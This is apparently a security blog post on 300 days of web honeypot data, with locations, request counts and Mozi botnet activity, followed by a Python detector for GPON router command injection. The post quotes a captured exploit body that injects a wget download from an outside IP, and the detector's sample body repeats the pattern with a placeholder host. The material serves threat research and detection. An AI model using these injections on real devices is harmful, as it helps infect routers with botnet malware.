
Showing posts from October, 2022

300 Days of New Web Honeypots

During December 2021, we deployed a new fleet of custom web honeypots written in Python Flask. The ongoing detections have been incorporated into our database as of January 3, 2022, and we are also pushing our detection feed to VirusTotal Collections. Approaching one year of collections, here are some observations and stats:

Locations where sensors are deployed:

- Sydney, AU
- Madrid, ES
- Amsterdam, NL
- Moscow, RU (which was forcibly shut down due to sanctions imposed as a result of the 2022 Russian invasion of Ukraine)
- Chicago, US
- New Jersey, US
- Iowa, US

We observed nearly 500,000 requests from over 38,000 unique IPs. A majority of the malware payloads we have observed are related to the Mozi botnet. You can find the related indicators shared on Abuse.ch ThreatFox here.

An example of this exploit observed in the POST body, which targets GPON home routers (CVE-2018-10561), is as follows:

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://221.205.75.24...
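
Added example, not part of the original post or the honeypot's own code: one way a sensor could classify a captured POST body like the one above, flagging shell metacharacters in dest_host and pulling out the downloader host for an indicator feed. The function name, result keys and sample bodies (TEST-NET address, placeholder file name) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Form fields set by the GPON diagnostic-ping request shown in the post.
GPON_DIAG_FIELDS = {"XWebPageName": "diag", "diag_action": "ping"}
# Characters that have no place in a hostname but let a shell run extra commands.
SHELL_META = re.compile(r"[`;|&$<>(){}\n]")
# Downloader URLs embedded in the injected command.
URL_RE = re.compile(r"https?://[^\s;`|&'\"<>]+", re.IGNORECASE)


def classify_post_body(body: str) -> dict:
    """Classify a form-encoded POST body captured by a web honeypot."""
    # Split on '&' only, so a ';' inside dest_host stays part of the value.
    # parse_qs also decodes '+' and %XX, so encoded variants are normalised.
    fields = parse_qs(body, keep_blank_values=True, separator="&")
    first = {k: v[0] for k, v in fields.items()}

    is_diag = all(first.get(k) == v for k, v in GPON_DIAG_FIELDS.items())
    dest_host = first.get("dest_host", "")
    injected = is_diag and bool(SHELL_META.search(dest_host))

    urls = URL_RE.findall(dest_host) if injected else []
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    return {
        "gpon_diag_request": is_diag,
        "command_injection": injected,
        "payload_urls": urls,
        "payload_hosts": hosts,
    }


# Constructed samples: the address is from TEST-NET-1 and the file name is a placeholder.
SAMPLE_EXPLOIT = (
    "XWebPageName=diag&diag_action=ping&wan_conlist=0"
    "&dest_host=``;wget+http://192.0.2.10:8080/sample.bin+-O+/tmp/sample"
)
SAMPLE_BENIGN = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=192.168.1.1"

if __name__ == "__main__":
    for name, body in (("exploit", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN)):
        print(name, classify_post_body(body))
```

A well-formed diagnostic ping is reported as a GPON request without the injection flag, so the two cases can be counted separately.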